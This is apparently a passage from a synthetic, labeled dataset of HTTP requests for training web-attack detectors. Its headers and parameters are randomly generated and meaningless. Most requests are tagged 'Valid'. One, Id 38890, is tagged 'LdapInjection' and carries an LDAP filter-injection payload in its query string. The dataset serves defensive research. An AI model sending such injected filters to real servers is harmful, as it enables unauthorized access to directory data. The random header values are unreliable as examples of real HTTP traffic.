Date: Sat, 11 Aug 07 03:27:52 CET
ETag: "RzlK9W2DHK5ziTY"
Expect: 100-continue
From: yiews@64sy.de
If-Modified-Since: Fri, 21 Nov 08 21:11:00 GMT
If-Unmodified-Since: Mon, 01 Oct 07 10:22:00 UTC
If-Match: "0@hdcJEgXpApw_s"
If-None-Match: *
If-Range: "Tiz7MTZsIhK5pcMk"
Max-Forwards: 7417
MIME-Version: 5.6
Pragma: 5oklw8ia='faemHt'
Proxy-Authorization: NTLM ZWJJZW1mMXRhYURudGFuc1JpZml0bmFpaWhhSWUzYWw=
Authorization: Basic bGlubndzdWk6dEtleQ==
Range: 761-,-655
Referer: /oeslo/ip3co/e9eSat.ace
TE: trailers,gzip;q=0.0,trailers
Trailer: Proxy-Authorization
User-Agent: Xiw8oenehw/6.1.3.5
UA-CPU: 68000
UA-Disp: 492,2265,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 869x955
Via: 8.1 www.msod9r.css
Transfer-Encoding: deflate
Upgrade: tcj/8.9
Warning: 754 111.149.39.187 "E4v7ars1jmvnre" "Mon, 09 Aug 04 19:29:50 CET"
X-Forwarded-For: 180.65.250.66
X-Serial-Number: 13224
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23760
Start - Id: 10401
class: Valid
GET /at-zPoQ7.dll? HTTP/1.1
Host: www.kliwmtpl3x.ch
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 0deetrec-ea
Cache-Control: no-cache
Client-ip: 208.80.138.55
Cookie: styleAbids7C=5472;nmsrEsedntu=passwdeg Ai ;brl0meeyte6=oh4kbyo;SIlezcnraeai=1453066444;dq=01719
Cookie2: $Version="54"
Date: Mon, 09 May 05 24:04:44 CET
ETag: "GfcGhNtO9Dp@cKZXz@J"
Expect: oanN
From: orBxod@ooRislo1t.st
If-Modified-Since: Tue, 08 Jul 08 19:01:29 GMT
If-Unmodified-Since: Thu, 04 Jun 09 19:50:42 GMT
If-Match: "8qQ@G-Hxn@j.2KEI"
If-None-Match: "TCQRgik6FXrrRVW5UIr"
If-Range: Sat, 14 Oct 06 12:56:31 CET
Max-Forwards: 1
MIME-Version: 3.9
Pragma: rn9en=e
Proxy-Authorization: 2tht ejer=oT7xhiau
Authorization: Basic cm9MaTpMdzhubw==
Range: 5-355295,61313-1,05930-37268
Referer: http://www.7ls1to.de/gnnube/ihooeetn/iobtect/hacedz8/elass.asmx
TE: chunked
Trailer: Accept
User-Agent: 1G79A@4yFq http://www.fosePc.de
UA-CPU: MIPS
UA-Disp: 063,647,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 552x911
Via: 9.8 212.124.24.213, 1.1 211.17.243.75
Transfer-Encoding: identity
Upgrade: eso/3.5, ddji/0.2, bfcnj/3.8, ofsuw6/8.7
Warning: 317 www.nwo2aaL.html "hrhexamatrte3elRbtn" 
X-Forwarded-For: 248.234.188.76
X-Serial-Number: 664473
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 10401
Start - Id: 742
class: Valid
GET /iyycWszoithtbnt/gnloaedNsoahoz/ePQPOZRJSbM5JsWVY1m/lrnCfNdirpSeidnu7/LcsgUdtnibocllkf4.html?2he9=rebn%27&oce=373023&8peyretwcaa=2&ar=deletebil HTTP/1.1
Host: 100.83.56.134
Connection: egtntsbu
Accept: application/*, text/xml;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 17.204.45.180
Cookie: 2qogadosc=(@us y e;oos5=tqFit:enph-aukajta(r i
Cookie2: $Version="6"
Date: Thu, 16 Aug 07 18:42:13 CET
ETag: W/"kX_5AQzVKf4QRAM"
Expect: ullec8ii=asBEe
From: eet5ayi@trifo.it
If-Modified-Since: Mon, 27 Mar 06 14:37:40 GMT
If-Unmodified-Since: Mon, 10 Oct 05 22:32:06 CET
If-Match: "P9fQlVXCJ@CtBT.8c"
If-None-Match: *
If-Range: "2yVMuxgdm_@XqSs"
Max-Forwards: 2580
MIME-Version: 2.7
Pragma: sswhrdi='nee'
Proxy-Authorization: cll2 orUtkN=3ekdTnt
Authorization: esuo hatrle4l=hrciin
Range: 5-,-2734
Referer: http://www.ehacahh.biz/reliaed/c7D4.dll
TE: chunked
Trailer: Cache-Control
User-Agent: eouYeG/8.1.9.8
UA-CPU: PowerPC
UA-Disp: 573,0887,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 879x7851
Via: 5.3 www.iRteoE.gif
Transfer-Encoding: compress
Upgrade: sNnb/0.0, sioc/7.0, inmmI/4.9, btat/9.8
Warning: 228 194.43.243.100 "i6jamotratateptotni" "Wed, 18 May 05 23:53:22 CET"
X-Forwarded-For: 161.122.52.147
X-Serial-Number: 93643715555060287385
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 742
Start - Id: 38890
class: LdapInjection
GET /juddropid/rfPeR6etpst3h6rj/7rundiiin/sokmpw/p1olgerO/eadegmop5b2epad/gdGsaNmSE8t8XmCM/ftEtaey4wrltnriiewt/axmoduqimeseTJtinr.html?nyeeAteudcoVuer=a4dnia03lidoo27heO&da=tdh%29%28%26%28objectClass+++%3D++oi*%29 HTTP/1.1
Host: 29.242.241.213
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.7
Accept-Encoding: gzip, deflate;q=0.4, deflate
Accept-Language: *
Cache-Control: no-cache
Client-ip: 191.208.34.138
Cookie: qpbhseaeir=sl3ryeioAsdehc2n;lRpib=E2ghomeei1t0datYNt;t38hnrlvm=aU7;r0yr0ht=tno;n2lrhlt3chajrha=nvDLVPMdz
Cookie2: $Version="1"
Date: Mon, 30 Jul 07 10:57:08 CET
ETag: W/"GQYvF59TeQfbrP-gc"
Expect: isoZd9h5=s7ntbi0r
From: w08rh3@rpehekeyi.com
If-Modified-Since: Thu, 03 Dec 09 13:35:35 GMT
If-Unmodified-Since: Thu, 08 Oct 09 18:01:44 GMT
If-Match: *
If-None-Match: "Ucorw73lqdr1lI9XTj"
If-Range: Sat, 19 Apr 08 11:56:07 GMT
Max-Forwards: 41
MIME-Version: 2.4
Pragma: avqey=srneu
Proxy-Authorization: NTLM dGlkZW5hZWV1dHRvZnNubWVpb2Jsb3FmWHRlYWxsZXRmZGU4
Authorization: Digest cnonce="etussser"
Range: 15934-,799-8058,-81465
Referer: /6hsadJa.jsp
TE: trailers,deflate
Trailer: Transfer-Encoding
User-Agent: ni7efe/4.0.0
UA-CPU: x86
UA-Disp: 117,0811,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 297x7324
Via: 3.7 212.12.149.213, bnne/4.9 www.rrth.shtml, 0.9 www.yItriu.js
Transfer-Encoding: etors; akatC=LOyruhn6
Upgrade: aHt/9.9, puadon/4.1, Ahs/8.1
Warning: 700 www.stne.htm "11aqgslaesnyan" "Thu, 27 Jul 06 11:31:56 CET"
X-Forwarded-For: 179.200.182.228
X-Serial-Number: 9521103915785136495
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38890
Start - Id: 8530
class: Valid
GET /YYUDE.msf?nWosml4oqce7eiy=an%5C2eqir%3Fzahbroe&ec=e&det=%27sahe%3DtN%285dlEfs&dstseirnN0ra=l%3Bwp-nthOoeer&tr8nBs=sMNu%40hAf&yeaitatr2tss=268&icemr3iminekt=%24rthnibetweenda+eieug&nmnairoA=openielon+evali&rrs08c9eyhis=ittzrcettor0p&ynd6seYew6=5878593&iDxpjter5uhnr=70897&ise0eooog7=rihzDZK6M7&JKnpvsock_streamG8Hb=q7yrlf HTTP/1.0
Host: 129.47.201.28
Connection: close
Accept: audio/basic, image/*, audio/*
Accept-Charset: iso-8859-9;q=0.5, utf-7;q=0.0, x-mac-icelandic;q=0.4, x-mac-greek
Accept-Encoding: 
Accept-Language: si58e-oOsear, foc-i, y-erariN;q=0.6, ac-rdt, t-y;q=0.1
Cache-Control: no-cache
Client-ip: 19.109.17.170
Cookie: Rascvc=6ylibhrfelst-;cvtnhettSi=insertoo&rcp;ap4e=pdnmenceitaoexkes;rumio5gnfnesrna=918964;d2eq=hgau~ehots;hbuErCt5toIb0=0247671
Cookie2: $Version="627"
Date: Wed, 08 Oct 08 09:09:34 UTC
ETag: "@3b8Aw30Yye0I7lw5e"
Expect: brcrn
From: laaisi@nHuI4faw.be
If-Modified-Since: Tue, 07 Aug 07 02:10:28 UTC
If-Unmodified-Since: Thu, 01 Jan 09 03:47:53 CET
If-Match: "Z3YpUr0sKTkBUIaMJLFr"
If-None-Match: "JAakQ14lj5l0NeapA5M"
If-Range: Fri, 12 Sep 08 13:00:09 CET
Max-Forwards: 7
MIME-Version: 7.7
Pragma: cdumh=ae
Proxy-Authorization: NTLM NTR0RWw4bmhpYmE3YW9zYTJlZXR0dGFyaE14bXJvbkNuaA==
Authorization: Basic cW9oc2l0OjFSaGRs
Range: 288-033,80242-026
Referer: /7ocrx7y/lef0/mpeyia4/mta5tm.txt
TE: trailers,deflate,chunked;q=0.3
Trailer: Accept
User-Agent: Mozilla/1.7 (compatible; Konqueror/2.7; Linux i586; dirqrp)
UA-CPU: 68000
UA-Disp: 7723,577,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 108x957
Via: aou/8.1 193.175.184.227, eaiasi/0.7 www.Srerrhu.htm:40
Transfer-Encoding: lwt9i
Upgrade: enzum/9.9, raa/9.5, wj1sa/0.1, 6mfdam/4.3
Warning: 959 www.mthw.html "Ermemjhtaoh" "Fri, 25 Feb 05 08:35:56 UTC"
X-Forwarded-For: 188.45.28.105
X-Serial-Number: 642382029635717
----: ----------------
~~~~~: ~~~~~~~~~~

null

End - Id: 8530
Start - Id: 26292
class: Valid
GET /nsH8M/hXJGe/Bk_IyclEUcz/yM/dPcatH_IJchild/rni/iahlswarGfciwtEd/oierosNrn/vs/tepgthaCb/ap.jpeg?aneSuks=rntsbpgi0group+byb8i&7iiaseasiteOrr=3956&37y-=8536&JmQ1CIT8location=713060&igzag5ssn=7891&iqslTYtettfN=561977234&Jwf397q=4841&ddens=sw&laoEjortgE=hp&rotaes9tt=fNPG2JU.oX HTTP/1.0
Host: 236.169.225.109:112
Connection: close
Accept: text/*;q=0.4, text/xml
Accept-Charset: *
Accept-Encoding: deflate, identity;q=0.3, identity;q=0.9, gzip
Accept-Language: o9C-az;q=0.3, lshrh-iuef;q=0.0
Cache-Control: it=suel
Client-ip: 165.62.121.178
Cookie: dyMiw355D7-0a=8;l3vnkSpEj5=925498568
Cookie2: $Version="03"
Date: Fri, 09 Apr 10 03:40:57 GMT
ETag: "R3Pm.B5zXQ_Z8rd@C10J"
Expect: 100-continue
From: Htoian@ttglhxafws.fr
If-Modified-Since: Fri, 30 Oct 09 20:43:42 CET
If-Unmodified-Since: Fri, 03 Oct 08 02:56:42 UTC
If-Match: "3LA6xzVR7pnDMtHtZ"
If-None-Match: "iVL7vKFTge0yQQn"
If-Range: *
Max-Forwards: 484
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest username="dnqaohe"
Authorization: Basic RXV0aWRBbDpsdmxp
Range: 338-840605
Referer: http://www.tuotr.ch/saionra/eeEar/cutq/5Plbl/ionhqPs.swf
TE: deflate;q=0.8,deflate;q=0.3,gzip
Trailer: Date
User-Agent: heOy4e (nf_1Are7; pDCrie9; hW-iL83Q)
UA-CPU: MIPS
UA-Disp: 509,4481,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3902x9522
Via: HTTP/6.0 189.91.5.101, 2.1 151.92.64.157:06, 5.8 212.54.174.116
Transfer-Encoding: compress
Upgrade: liya/7.1, bae/3.3, ava/0.7, 6we6/3.5
Warning: 536 230.80.52.166 "enysnbtmlEweDe" "Sun, 28 Sep 08 15:57:41 GMT"
X-Forwarded-For: 212.21.79.197
X-Serial-Number: 93545623104
----: ----------
~~~~~: ~~~~~~~~~~

null

End - Id: 26292
Start - Id: 30231
class: Valid
GET /aJw6G4N/oeoeopJssk/hAv8If.Lobv/rIgH_eKBPWLVJJ-O/oD9Qvark6CF/keXc0frlhP@PwhereiT/5t/h.9nTGpVzSin/prtUTS@AE38R-S/rs9neeel.htm? HTTP/1.0
Host: 202.55.183.98
Connection: chseneA
Accept: */*
Accept-Charset: x-mac-ce;q=0.1, iso-8859-9;q=0.1, x-mac-arabic;q=0.6, big5
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.5
Cache-Control: min-fresh=10
Client-ip: 105.173.157.0
Cookie: skT=tslghi ldhg
Cookie2: $Version="0"
Date: Fri, 09 Feb 07 12:18:37 GMT
ETag: "kVwijeAcZzUzGU5mZYyZ"
Expect: 100-continue
From: OtuSewg@hqerotci.biz
If-Modified-Since: Tue, 18 May 04 11:02:27 GMT
If-Unmodified-Since: Fri, 10 Apr 09 03:09:54 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 12 Jan 06 16:44:22 GMT
Max-Forwards: 17
MIME-Version: 8.0
Pragma: n15='riiaMe4'
Proxy-Authorization: cauv rfTcyhia=lorfye
Authorization: Digest username="deilL"
Range: 346642-698,469-394,8-
Referer: http://hohd.uk/enosgs/Xa2hes.mdb
TE: chunked,deflate,chunked
Trailer: Date
User-Agent: DHnboeva (uLLYWRIv; aWB1kJbpw; sJV8QMyPy)
UA-CPU: Sparc
UA-Disp: 2135,180,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2607x1931
Via: FTP/6.2 www.raoauzL.jpeg
Transfer-Encoding: identity
Upgrade: rtW2/3.4, ohothc/2.6, cDbs/6.4, Evs/7.7
Warning: 579 185.81.167.241 "3i0d" "Wed, 17 Jan 07 24:46:17 CET"
X-Forwarded-For: 172.159.37.56
X-Serial-Number: 19194011026
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30231
Start - Id: 21933
class: Valid
GET /e8fnppjes/e@.shtml?MiANO9JY=61011781&nwagbmasejmA=trmftegnlod&ralTElOeEtfFa=17&Ie=%26u&iGJKq=eed&Rde=metjj1rdcsPedtpsav&d2ctfsdatom4=29&ei=74763987&cz4h3RmoSY_=0343549&eabiilyhhp=skewA++%26agroup+byn+%3F HTTP/1.1
Host: 36.198.125.109
Connection: close
Accept: image/*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: e-19usoita;q=0.4, 2eine1yr-u;q=0.8, dyrftn-rx;q=0.8, npi-rr;q=0.7
Cache-Control: max-age=6343
Client-ip: 16.219.91.127
Cookie: utnqetaoo=155807;Dp3mZLkkGJE= jn7gncer;ddt=xanr;70YSHPFzsock_streamq=t1oh;bpgo1trtwcsw=sohay8fhodaia
Cookie2: $Version="21"
Date: Sat, 10 Jun 06 24:30:12 GMT
ETag: "rlo9571faST22_O7C@6v"
Expect: stooeyr=sire;4eafodr
From: eregee@ddutgEiyN.be
If-Modified-Since: Sat, 28 Apr 07 01:00:13 CET
If-Unmodified-Since: Mon, 13 Dec 04 03:11:57 CET
If-Match: *
If-None-Match: *
If-Range: "vOXgYMQvaRrArUt."
Max-Forwards: 636
MIME-Version: 5.9
Pragma: i9=3a0as1tm
Proxy-Authorization: Basic YXBiYTpqZW1r
Authorization: Digest response="Cd48b86aC215Ad29f3a60B8F24Aba3bD"
Range: 5944-,-4,93231-
Referer: /ey8eea/ro2dfy/letlF4ed.php3
TE: chunked,trailers,trailers
Trailer: Referer
User-Agent: Mozilla/2.1 (Windows; U; WinNT 2.6; wi-ra; rv:2.7.0) Gecko/35993596
UA-CPU: x86
UA-Disp: 964,7426,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6616x2901
Via: gxnT/2.5 www.psDooes.js, 0.8 www.srRrer.jpg
Transfer-Encoding: gzip
Upgrade: tsIsb/2.6, e8n/5.1
Warning: 706 118.112.66.251 "faTC6" "Thu, 05 Oct 06 20:03:57 UTC"
X-Forwarded-For: 210.111.100.63
X-Serial-Number: 09176432061314
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21933
Start - Id: 6764
class: Valid
POST /ayMb5zYRl7-Av7PQaSw/iKZcO5gGRYt/phanbOr.mspx? HTTP/1.1
Content-Length: 63
Content-Language: r,r2yret3o,p7in
Content-Encoding: identity
Content-Location: http://www.pge8.org/laaGb/hrTM/pmwaboea/arlz7kt/5t18he.nsf
Content-MD5: bm1lVGlhd2hqYWV5bFRpdw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 28 Jul 09 10:02:56 CET
Last-Modified: Mon, 05 Oct 09 01:55:03 CET
Host: 230.141.129.228
Connection: close
Accept: application/*;q=0.6
Accept-Charset: utf-7;q=0.4, euc-cn, iso-2022-jp;q=0.4
Accept-Encoding: deflate;q=0.4, compress, deflate, deflate
Accept-Language: pon-neaqrTao;q=0.6, nneizae-m;q=0.9, 0SrExh-i0ngP;q=0.2, ebseE2-uugt;q=0.7
Cache-Control: m1aer='fnxe'
Client-ip: 166.208.84.151
Cookie: h55uu=tore9e$tt;2cGjV=rlea;f5attD=88512;adoetn=tZ2;UhpZEma04winntO=$IaEattkhiat$thn
Cookie2: $Version="11"
Date: Fri, 21 Nov 08 15:18:27 GMT
ETag: W/"2OHyIFx6vyE_y4Nr"
Expect: netr=smijneen
From: i6Nyv@5oumwccEOt.be
If-Modified-Since: Sat, 07 Feb 09 12:17:35 CET
If-Unmodified-Since: Sun, 08 Mar 09 18:52:11 CET
If-Match: *
If-None-Match: "dyjco0bQxFe2uMpe@ee"
If-Range: Fri, 14 Dec 07 06:46:44 GMT
Max-Forwards: 926
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic cnRyaDpudG5yZHdv
Authorization: NTLM aG9pZW1odHhpcnI0dXNFMXRsbWR0bm12MXRibnVha21jb3Ny
Range: 56346-5
Referer: http://www.erektA.it/brpelc/T1Daieio/eiwh/OirdAhFl/sq5dn.php3
TE: chunked,trailers
Trailer: Accept
User-Agent: yd3mc (hbAO.lN; nW97AS; e3dBK3S-c; tskm8F@l0; nrSonThh)
UA-CPU: StrongARM
UA-Disp: 342,103,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3268x616
Via: HTTP/5.7 152.250.8.243:75808, HTTP/5.0 144.214.136.125, 1.2 61.114.194.174
Transfer-Encoding: gzip
Upgrade: rie/7.4, 5Iena/2.4, fuca/0.7
Warning: 686 27.211.29.45 "sijrpot" "Sat, 10 Jun 06 10:21:01 UTC"
X-Forwarded-For: 191.106.203.155
X-Serial-Number: 830725
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sisZrsttAtAeo=eeu&dzacdiail4z=+execustni e'hrle&engo=szfKKz

End - Id: 6764
Start - Id: 23033
class: Valid
GET /4T9ecdgp6rIlovieotsu/xjdnZnZ-k_Q964/li1Wzwo7ufx2/i3E-tA/2iiseWcar/a@Tv8z4m/GRKulsN6eBI_nxDx/noirrts4s9et.jpg?A-jhVrNi=25&FnZ@F6Cn=hfP-YU-mk5&P69G96-echoperlPphph=yseaoqdkjmhti2 HTTP/1.1
Host: 94.85.68.185
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesetrad, iso-8859-3;q=0.6, shift_jis;q=0.6
Accept-Encoding: 
Accept-Language: hRsu6-hcolmia;q=0.1, a3haiR-8cfho;q=0.2, rhdi-a;q=0.9, zv4-eFs;q=0.7
Cache-Control: max-age=28955
Client-ip: 225.160.113.7
Cookie: eLWsttjqiy8t8tv=e;uafl=tta5Oeqctare;boen=slt~m
Cookie2: $Version="4"
Date: Sun, 28 May 06 07:46:57 CET
ETag: W/"V2YHZdUh.94W3DyH"
Expect: 100-continue
From: itlt@Trihh.org
If-Modified-Since: Sun, 21 Mar 10 15:32:18 GMT
If-Unmodified-Since: Sat, 05 Nov 05 16:58:42 CET
If-Match: *
If-None-Match: "_bDBBCwIqpND6OL2"
If-Range: Thu, 22 Feb 07 03:19:10 CET
Max-Forwards: 7
MIME-Version: 2.9
Pragma: tu=lnttRYd9
Proxy-Authorization: Basic aHN4ZWNubGM6aHplcnBlTHI=
Authorization: NTLM cnNuZWlvZXF0ejZBbmVzcWFheWFuaG9zaXRlYmFucGtkZXJqZW5haXJzdG5pZUE=
Range: -41
Referer: /auij/i0ohbl/itke5el/iogu.tiff
TE: deflate;q=0.3
Trailer: Warning
User-Agent: Mozilla/7.2 (Windows; U; Win 9x 3.0; ym-Sh; rv:8.3.2) Gecko/56165418
UA-CPU: x86
UA-Disp: 8779,521,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 6076x9120
Via: FTP/0.1 75.67.210.226, 2.3 131.186.153.160:0
Transfer-Encoding: gzip
Upgrade: 4ioa/3.2, ourts/6.6, pUr8/3.5, poy1h/9.5, oursss/9.1
Warning: 738 www.grsFeoxo.png "itas" 
X-Forwarded-For: 160.34.50.92
X-Serial-Number: 794051
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 23033
Start - Id: 11371
class: Valid
GET /mnwW7PuSFv30j/eHOEPqRrMSUd1750@hr9/oHDR7x7ua_mqSjGSYil/r4ZZoefdwys.ChO/shW93Q/oqxth8FzkMVSxJaflVmv.pl?a2h3nhb2lecqI=62&h8eboinrofs=9&HhOoirtett=aunionE%3Dt4Nb%5CsA8oi&oeoen=35&awihi3oe=Wonih0sne6eda9&rcpoaaDr=39449 HTTP/1.0
Host: 109.129.109.26:2829
Connection: close
Accept: text/xml;q=0.2, text/*;q=0.8
Accept-Charset: windows-1257;q=0.7, iso-8859-3;q=0.1, iso-8859-8-i, iso-8859-5;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 90.63.149.173
Cookie: hnuX=379
Cookie2: $Version="94"
Date: Mon, 28 Mar 05 22:21:23 GMT
ETag: W/"3M8cDySpghlrU1RNRf4"
Expect: 100-continue
From: ap2s@tiVznaj.com
If-Modified-Since: Tue, 12 Jul 05 18:18:20 UTC
If-Unmodified-Since: Fri, 21 Jan 05 20:12:52 CET
If-Match: "LqAE9oghGPpoxAIwCu"
If-None-Match: "3q.rYOOFtMCC7MHSCAw"
If-Range: *
Max-Forwards: 5
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest uri=/EcbyfndI/afl8/Taie.txt
Range: -6791,6-,-511169
Referer: /ulnn/fj2oM/hp1ssr6.css
TE: deflate,gzip,chunked;q=0.1
Trailer: Upgrade
User-Agent: edxuiioen/6.5
UA-CPU: StrongARM
UA-Disp: 299,1774,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6133x6762
Via: HTTP/6.7 232.250.239.83:5193, FTP/2.5 113.214.103.178
Transfer-Encoding: prge; eeaaepzt=osq7i4
Upgrade: iAsv/6.0, wsydh/9.0, asdrd/6.4, ea7/7.8
Warning: 549 54.14.146.24 "veiinschlftang5nhhmr" 
X-Forwarded-For: 100.230.251.99
X-Serial-Number: 0505318
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11371
Start - Id: 29649
class: Valid
GET /455/hEVI4sb_CvdpKcO/P_7gopositionn/PgW8lx/7Q/p4MiTkhCpE/Aergq/1Oeja/xp_vNtelnetb0Kg/aUx50p.PCfPCDrX/o_c0y.oQ-5Tz/9execU8Nja5w.js?iavmeDn640e=5d9lNony%7Et%3C+odivwoR&8qPo6ei9eni=is0wLD-Eeq0&dsort=169303&mvbiOPiwgsrs=el9sosDNeaDrhe7n&sr6pcyhu5g2St=++tsErnr-&nvEeCzdc=146294&en01dt=%3B%2F6ihdr2o&noeaGeetcjewn=aesemvdm9dbyE&asabslcti5q2qhl=td5Dkfh&286jG=lqMSJBQ&fesemyr0vr1u=57&o8mqdgsss8=autoexecD&wTiframeV=s0edeh HTTP/1.0
Host: www.iAaarartr.be:80
Connection: close
Accept: image/jpeg;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: eg14git-f, u7lPaphm-1beUedsR
Cache-Control: min-fresh=506
Client-ip: 108.9.167.104
Cookie: it=e0uEiusrtpssowgetasrcprli;KGmyA=lXpyzZ_;eqspireeqIt=mssyoede;nfhYo4lkpei=ldae
Cookie2: $Version="70"
Date: Fri, 25 Aug 06 09:27:22 GMT
ETag: W/"BXbiIEtuiIWB9C8ts"
Expect: adw5as=eesw
From: eeni@INWop.de
If-Modified-Since: Thu, 10 Jan 08 20:58:33 GMT
If-Unmodified-Since: Wed, 17 Jan 07 15:07:35 UTC
If-Match: "Y7oSqE-Lrkhd_Wt"
If-None-Match: "8r4hFfRzuQo-Vpkv-BG"
If-Range: *
Max-Forwards: 01
MIME-Version: 6.8
Pragma: lmeee=ao
Proxy-Authorization: aaia arnindeT=eleO6
Authorization: NTLM bDhlZW9jbjk3bW50bGhhZTZvNWRpdHB0bnUxY09tdHJhZWN1bw==
Range: -146,1-593943,-3282
Referer: http://RzeOh.de/sR4ch/iiltpe/aeeoWE.wmn
TE: chunked,chunked;q=0.7
Trailer: Upgrade
User-Agent: Mozilla/4.6 (Machintosh; U; PPC 9.3; g9-Lo; rv:8.5.4) Gecko/74677989
UA-CPU: 68000
UA-Disp: 844,9536,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8055x615
Via: sa1/4.5 www.gsortsm.shtml, stEsrr/8.2 www.otdeahH.html
Transfer-Encoding: identity
Upgrade: nbyrR/0.6, hSeaai/0.0
Warning: 842 191.175.28.20:7552 "Rsyggrjuilniiaoo" "Sun, 10 Feb 08 01:16:21 GMT"
X-Forwarded-For: 1.132.193.200
X-Serial-Number: 149051815209
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29649
Start - Id: 32204
class: Valid
GET /6razlegqaeos/7sKZrs5gka/ahpeuvIty4y3eaean/mowu0zepkrgh/7O.2M3.feYAKP/rkn5aes3otnNoCo4qewa/lcedEABdhWeV/nameltab.bin?is=8s&oohc6Gs=mfZI2%400m&4Ttahu=eejl&ww3=1687004518&oaarcOaeeksctg=mxtour&9iApeRirbaneec=455127465 HTTP/1.0
Host: 118.1.85.152:80
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 73.140.187.64
Cookie: drwp-vRz=4;lttiq=0384811
Cookie2: $Version="60"
Date: Sun, 02 Jul 06 20:15:36 UTC
ETag: "O0G-.HMRb0v5n3.XSi_"
Expect: Rarwce=ztdSeore;sbpvwtEE=0xmcltO
From: zxtk@taedSwvsh.gov
If-Modified-Since: Sat, 10 Apr 04 17:53:01 GMT
If-Unmodified-Since: Tue, 18 Oct 05 08:05:55 CET
If-Match: *
If-None-Match: "8PzkU@I2zS.yHUL"
If-Range: Wed, 02 Jul 08 07:31:46 GMT
Max-Forwards: 061
MIME-Version: 7.1
Pragma: efeei8f9=poHeovoI
Proxy-Authorization: NTLM bmU2ZWU5ZWRiSGZPbmtobGxHb2JzbkF3dGFydXJhb29ycw==
Authorization: aea3ed knoN=Omeat
Range: -31011,02795-
Referer: http://efuo.org/9honaie/egcN.js
TE: deflate,deflate
Trailer: Range
User-Agent: rsrtaQm6fc7
UA-CPU: 68000
UA-Disp: 666,662,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 9868x2835
Via: 5oki/0.9 www.sddle.shtml, 0.1 www.9Roat.png:8018
Transfer-Encoding: compress
Upgrade: wahas/0.3, g2i27/7.9, nondad/8.9, en7/2.8, tgms/5.0
Warning: 465 144.103.243.13 "dfhVber4aysot1d" 
X-Forwarded-For: 122.80.70.14
X-Serial-Number: 76488
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32204
Start - Id: 7213
class: Valid
PUT /havingO/nlnb3freiaphs/geehsoiibqtrcNtdlEa/6seizgCgttptc2eE7dl1/0BR.jpg? HTTP/1.1
Content-Length: 246
Content-Language: luttE
Content-Encoding: gzip
Content-Location: /sthaBb/A2rsh/hste/tsxf6wil.mpeg
Content-MD5: NGl2YWxlaHRvZWFnZHV0aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 25 Sep 08 01:16:25 CET
Last-Modified: Fri, 27 Jun 08 15:47:45 CET
Host: www.e7prl5sheu.fr
Connection: close
Accept: */*
Accept-Charset: iso-8859-5
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: max-stale=3712
Client-ip: 255.188.160.16
Cookie: eaja=sF.9Aeh2r9M;acceptgI3E3oMrcp=rr7eljcu8h
Cookie2: $Version="1"
Date: Tue, 02 Oct 07 17:22:22 UTC
ETag: W/"NWIylEm8u9@rYrRo"
Expect: tferrd
From: eklcds@EusetgdssJ.biz
If-Modified-Since: Sat, 09 Oct 04 07:39:05 GMT
If-Unmodified-Since: Sat, 04 Mar 06 12:11:07 CET
If-Match: ".WeItze4kwTm2QnTL"
If-None-Match: *
If-Range: "sk_l1JMmlMU0_3q6kk6"
Max-Forwards: 270
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Basic Q21lbnM6Zmx3TnR0em0=
Authorization: nlt3Oh 8issjt=tyseo
Range: 669-31,4-,004727-
Referer: http://www.Usetnl.net/nrDYt/elxAba/pity.sh
TE: chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.0 (compatible; d3hc; Windows NT; 7hsOh; YCeuhem3)
UA-CPU: 68000
UA-Disp: 5578,6674,16
UA-OS: Linux
UA-Color: color8
